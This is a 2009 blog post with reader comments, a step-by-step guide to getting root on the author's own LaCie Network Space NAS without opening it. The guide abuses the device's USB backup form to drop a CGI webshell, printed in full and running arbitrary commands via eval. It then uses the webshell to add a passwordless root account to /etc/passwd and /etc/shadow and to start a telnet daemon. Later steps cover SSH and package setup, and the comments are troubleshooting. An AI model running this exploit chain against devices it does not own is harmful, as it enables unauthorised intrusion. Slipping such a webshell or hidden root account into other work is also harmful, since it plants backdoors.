2009-08-10

Get root on the Lacie Network Space without opening it

Note -following these instructions is very likely to invalidate your warranty and possibly brick your network space. I take no responsibility for this. You have been warned.

As I mentioned the other day I had problems playing media on my new TV from my Lacie Network Space NAS. There are instructions on the Nas Central Wiki for taking apart your NAS, attaching the drive to another (Linux) computer and overwriting stuff. Most of this info was gained from a site describing how to hack another NAS, the Edmini V2. Tantalisingly, in the comments for that page there was an instruction for getting this working purely through software. The instructions were slightly difficult to follow so I have decided to document them again here, but really they belong to the anonymous commenter.

This whole hack revolves around the backup function of the NAS, which allows one to backup the contents of a USB device to the hard disk. Fortunately for us, the parameters for this backup are all sent via fields in a web form -which allows us to download the page, alter the parameters to suit our purposes and away we go. To start I created a Linux Ext3 formatted USB key (I used an Ubuntu development virtual machine). I created a file webshell on my desktop with the contents:

#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

And also downloaded a telnet daemon to the desktop. Next I created a directory on the stick, copied the files over and set the file permissions:

mkdir /media/disk/hack
cp Desktop/utelnetd /media/disk/hack
cp Desktop/webshell /media/disk/hack
chmod -R +x /media/disk/hack


I popped the stick in the USB port on the front of the Lacie and navigated to the config pages at http://nas/config from my laptop. I did a view source cut and paste everything into a new text file on my desktop and searched for:
common.js - prepended http://nas/ to the start of the src (src='http://nas/javascripts/common.js')
edit_form - prepended http://nas/cgi-bin/admin/ to the start of the action (action='http://nas/cgi-bin/admin/backup)
usbdisksdb1 - changed the value to match the directory name on the stick (value='/home/usbdisksdb1/hack')
selected - changed the value to the web cgi directory (value='/www/cgi-bin/admin')

I saved the file on my desktop then opened it in Firefox then hit the Start button, an error flashed by as the page redirected but the lights on the NAS and the USB stick both flashed and eventually the page redirected to the NAS version of itself.

The NAS creates a timestamped backup directory. Fortunately there is a way to see what this directory is called using the Twonky server (which is, ironically the thing that isn't working in the first place). Navigate to http://nas:9000/rpc/set_option?contentbase=/ (This presumes that you've unlocked access to the Twonky config page). Then to http://nas:9000/config where you can hit one of the Browse buttons and navigate down through: /www/cgi-bin/admin/ and see your folder name. Cut this name out, in my case it was: hack-200001030801946888523 and paste it into the following string:

http://nas/cgi-bin/admin/'FOLDER'/webshell?ls


I was rewarded with a directory listing appearing in firefox. At this point I followed another comment, by Danny Milot and did:

http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?find / -name passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp passwd passwd.ori; ls -als passwd*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:x:0:0:Linux User,,,:/home:/bin/sh >> /etc/passwd; echo sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin >> /etc/passwd; cat /etc/passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:$1$4VBM4/sM$R2TB/cCBAb11R5LH4VGhU/:12488:0:99999:7:::; echo Password for new_root is admin
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp shadow shadow.ori; ls -als shadow*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root::12488:0:99999:7::: >> /etc/shadow; echo No password; cat /etc/shadow
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?./utelnetd

At this point I was able to successfully telnet into the NAS! Using new_root as the username and blank password. I'm lazy so I decided to use ipkg to install things. I followed the manual bootstrap instructions, which didn't work at first until I removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes. Then it was a case of:

ipkg update
ipkg install openssh
ipkg install nano


Then just a case of sorting out some startup scripts:

cp /opt/etc/init.d/S40sshd /etc/init.d/sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S20sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc6.d/K09sshd

Then changing the password:

passwd new_root


Finally, there is a cleanup file that resets and deletes things, at /etc/rc.d/rc3.d/S12cleanConf -so I just commented everything out in it. I rebooted and SSH didn't come up. This was because of the .optware directory not mounting. I copied the contents of that out to the user area and then stuck it in the fstab:

mkdir /home/.optware
cp -r /share/.optware/* /home/.optware
echo /share/.optware /opt auto rw,bind 0 0 >> /etc/fstab

And then created a /etc/rc.d/rc3.d/S12mountopt file with mount /opt in it.
Then the webshell hack and the utelnetd can be removed and Bob's your uncle.

11 comments:

stephane.guelec said...

Perfect, it works very fine for me.
Just a remark, there is a mistake

The request
"http://nas:9000/rpc/set_option?content_base=/"
is in fact "http://nas:9000/rpc/set_option?contentbase=/"
enjoy sshd & ipkg on the networkspace

Tim said...

Stephane,

Thanks for the correction. I'm glad that you've managed to get root on your Lacie, it certainly increases the usefulness of the device.

Cheers,

Tim.

Liste Indépendante 3 said...

Hello there,
Many thanks it worked and now I have ssh running on Lacie Network Space (750GB firmware 1.1.4). Couple of comments/adaptations I did:
- The page for backup to edit and change is actually at http://dakroub-backup/cgi-bin/admin/backup
- You have not to forget to do chmod +x on S12mountopt and also I used /home/.optware to mount /opt (isn't it what you intended when you copied the content to /home/.optware ?)

In any case, many many thanks for the instructions!

- Alain

William said...

Can you explain in more detail how you unlocked the Twonky config page please?

Tim said...

William,

It's documented here: http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

Essentially, just set the IP of your NAS to 192.168.1.61 and the IP of your PC to 192.168.1.6. Then access the config page at: 192.168.1.61:9000

William said...

Thanks, worked fine.

I would like to install ipkg. You said that you had to "removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes.". Could you elaborate on that a bit please?!

Cheers

Tim said...

Like I say I think there was a spurious entry in /etc/resolv.conf, so I re-wrote the file with the IP of my router a la:

echo "192.168.1.254" > /etc/resolv.conf

Kyle said...

Tim,

I have a question concerning this post. Did you then install a webserver package such as Apache or Lighttpd after gaining root access to the device? I recently purchased a Roku Streaming TV box, and am trying to connect it to my Lacie NetworkSpace2 NAS which I purchased for the intention of streaming media files from. However, the Lacie NAS cannot do this out of the box, and I am having a hard time finding documentation on how to do this. I am assuming that I need to follow your tutorial to gain root access, but then where can I go from there? The Roku needs to access a web server to build it's media directories. Please let me know if you have any thoughts and would be interested in helping me out with this. Thank you.

-Kyle

Tim said...

Kyle,

I haven't installed my own webserver on the Lacie. I haven't needed one for anything.

Note that there is already a webserver installed (running the admin pages), so it is possible that if you got root you would be able to direct that to your content directory.

The binary is /usr/sbin/httpd. If the roku supports specifying a port you could run the httpd on 8080 or something. It should be a simple case of copying the /etc/init.d/httpd script to /etc/init.d/httpd2 and changing the variables for port and directory (to /home/openshare/).

Hope this helps.

Cheers,

Tim

Kyle said...

Tim,

I have received root access on my Network Space. Here is what Terminal is giving me:
------------------------------------
Last login: Sun Mar 6 18:05:36 on ttys000
kyles-macbook-pro:~ kyleaffolder$ ssh -i ./lacie_ns2 root@192.168.1.42
The authenticity of host '192.168.1.42 (192.168.1.42)' can't be established.
RSA key fingerprint is 76:bf:66:74:3e:60:0c:9e:aa:60:8a:13:6a:c3:9e:45.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.42' (RSA) to the list of known hosts.
Identity added: ./lacie_ns2 (./lacie_ns2)
[root@NetworkSpace2 ~]#
------------------------------------
So, I'm pretty sure that I now have root access via SSH. I'm confused as to what steps to take next though when setting up the web server directory. Could you maybe type these out in a little more detail...step by step? I would really appreciate it!!!
Here is what you had mentioned earlier:
------
"Note that there is already a webserver installed (running the admin pages), so it is possible that if you got root you would be able to direct that to your content directory.

The binary is /usr/sbin/httpd. If the roku supports specifying a port you could run the httpd on 8080 or something. It should be a simple case of copying the /etc/init.d/httpd script to /etc/init.d/httpd2 and changing the variables for port and directory (to /home/openshare/)."
------

How would I now go about changing directories/copying the scripts/changing variables/etc? I'd greatly appreciate any help or further insight into this matter. I feel as if I'm close to getting this problem solved. Could you maybe enlighten me on what I need to type into terminal from here on out?

Thank you for your time!

-Kyle

Tim said...

Kyle - I've looked a little further into this and there is a good chance that it won't work using the built in httpd. I don't think it does directory listing, which is I presume what the Roku needs.

If you've installed ipkg, try running:
ipkg install lighthttpd

There are some instructions here: http://tomatousb.org/forum/t-282372/lighttpd-on-tomato-usb#post-919862 on configuring, specifically you'll want to change the document root and the port that it runs on.